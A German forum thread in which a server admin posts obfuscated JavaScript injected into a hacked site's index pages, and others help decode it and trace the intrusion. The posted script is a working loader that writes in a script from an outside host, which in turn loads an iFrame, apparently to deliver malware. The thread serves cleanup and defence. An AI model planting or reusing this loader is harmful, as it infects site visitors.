JavaScript auf kompromittiertem Server

[niemandwichtiges]

Hallo zusammen,

ich habe auf einem kompromittierten Server JavaScript Code gefunden, der scheinbar von einem Bot in alle index.php und index.html Seiten eingefügt wurde.

Wie der Einbruch zustande kam ist inzwischen klar und alles weitere wie ein Neuaufsetzen wurde in die Wege geleitet.

Nun frage ich mich trotzdem, was das Javascript macht, da es verschlüsselt ist. Hat jemand eine Idee ?

Hier das JavaScript:

Code: Select all

<script type="text/javascript">var gRYBe1oT = "ihhu328ihhu335";var ta0QoMGA0 = "ihhu33cihhu373ihhu363ihhu372ih"; var ta0QoMGA1 = "hu369ihhu370ihhu374ihhu320ihhu"; var ta0QoMGA2 = "374ihhu379ihhu370ihhu365ihhu33"; var ta0QoMGA3 = "dihhu322ihhu374ihhu365ihhu378i"; var ta0QoMGA4 = "hhu374ihhu32fihhu36aihhu361ihh"; var ta0QoMGA5 = "u376ihhu361ihhu373ihhu363ihhu3"; var ta0QoMGA6 = "72ihhu369ihhu370ihhu374ihhu322"; var ta0QoMGA7 = "ihhu320ihhu373ihhu372ihhu363ih"; var ta0QoMGA8 = "hu33dihhu322ihhu368ihhu374ihhu"; var ta0QoMGA9 = "374ihhu370ihhu33aihhu32fihhu32"; var ta0QoMGA10 = "fihhu363ihhu36fihhu375ihhu36ei"; var ta0QoMGA11 = "hhu373ihhu36cihhu361ihhu376ihh"; var ta0QoMGA12 = "u32eihhu373ihhu365ihhu372ihhu3"; var ta0QoMGA13 = "76ihhu365ihhu36dihhu370ihhu333"; var ta0QoMGA14 = "ihhu32eihhu363ihhu36fihhu36dih"; var ta0QoMGA15 = "hu32fihhu32fihhu36dihhu36cihhu"; var ta0QoMGA16 = "32eihhu370ihhu368ihhu370ihhu32"; var ta0QoMGA17 = "2ihhu33eihhu320ihhu33cihhu32fi"; var ta0QoMGA18 = "hhu373ihhu363ihhu372ihhu369ihh"; var ta0QoMGA19 = "u370ihhu374ihhu33e"; var Dr6aBsRr = "gBEj328ihhu335";var LMOjuKdO = ta0QoMGA0+ta0QoMGA1+ta0QoMGA2+ta0QoMGA3+ta0QoMGA4+ta0QoMGA5+ta0QoMGA6+ta0QoMGA7+ta0QoMGA8+ta0QoMGA9+ta0QoMGA10+ta0QoMGA11+ta0QoMGA12+ta0QoMGA13+ta0QoMGA14+ta0QoMGA15+ta0QoMGA16+ta0QoMGA17+ta0QoMGA18+ta0QoMGA19; mWh6WOln = LMOjuKdO.replace(/ihhu3/g,"%");var qxMicDSd = unescape;var gRYBe1oT = "JZGKi28gBEj335";w9221 = this;var jb4cyJmr=w9221["WJd5GoGJc2uG5mJGe2JnltJ".replace(/[J52WlG\:]/g, "")];jb4cyJmr.write(qxMicDSd(mWh6WOln));</script>

[Joe User]

Ersetze das write am Ende durch alert und führe das Script aus, dann siehst Du das wahre Script, ohne dass es ausgeführt wird.

[niemandwichtiges]

wow, super tip mit dem alert.
Es lädt ein weiteres JavaScript Element nach, das wiederum ein iFrame lädt.
Was das macht ist mir allerdings rätselhaft, da es mich als "Nicht-bot erkennt"

[Joe User]

Dann wird es so sein wie matzewe01 vermutete und es wird Malware nachgeschoben.

[rudelgurke]

Für FF gibt es die WebDeveloper Erweiterung mit der Option "View generated source" - der zeigt dann auch an was da ausgeführt wird.
Ist auch möglich dass von der Iframe Seite wieder von irgendwo anders etwas geladen wird.

[Alhambra]

Hallo zusammen,

ich habe auf einem kompromittierten Server JavaScript Code gefunden, der scheinbar von einem Bot in alle index.php und index.html Seiten eingefügt wurde.

Wie der Einbruch zustande kam ist inzwischen klar und alles weitere wie ein Neuaufsetzen wurde in die Wege geleitet.

Nun frage ich mich trotzdem, was das Javascript macht, da es verschlüsselt ist. Hat jemand eine Idee ?

Hi,

in den letzten 3 Tagen habe ich die gleiche Sauerei auf meinem Server beseitigt. Leider habe ich noch keine Ahnung, wie das zustande gekommen ist.
Kann mir jemand sagen, wie der Bot Zugriff auf den Server bekommen hat? Ich muß unbedingt die Sicherheitslücke schließen, sonst geht das ja garantiert wieder von Vorne los.

Vielen Dank für Deine Infos - im Vorraus,

LG

[rudelgurke]

Ein Blick in die Logs müsste Aufschluß geben. Normalerweise wird sowas per Injection reingeschoben, RFI oder Code Injection oder ein Script dass Dateien modifiziert und dann mit entsprechenden Parametern versorgt andweitig Änderungen vornimmt.
Bei Foren die ihre Stylesheets und ähnliches in der Datenbank ablegen geht das Ganze noch per SQL Injection.
Hier auch unbedingt die eingesetzte Software überprüfen ob da alles auf dem aktuellen Stand ist und über eventuelle Lücken informieren, dass dürfte bei der Suche in den Logs zumindest etwas helfen die Sache einzugrenzen.

Achso - für die Zukunft - vielleicht darüber nachdenken ein IDS einzusetzen dass Prüfsummen erstellt. Meldet sich dass besteht zumindest ein Anfangsverdacht und man merkt früher dass etwas nicht stimmt.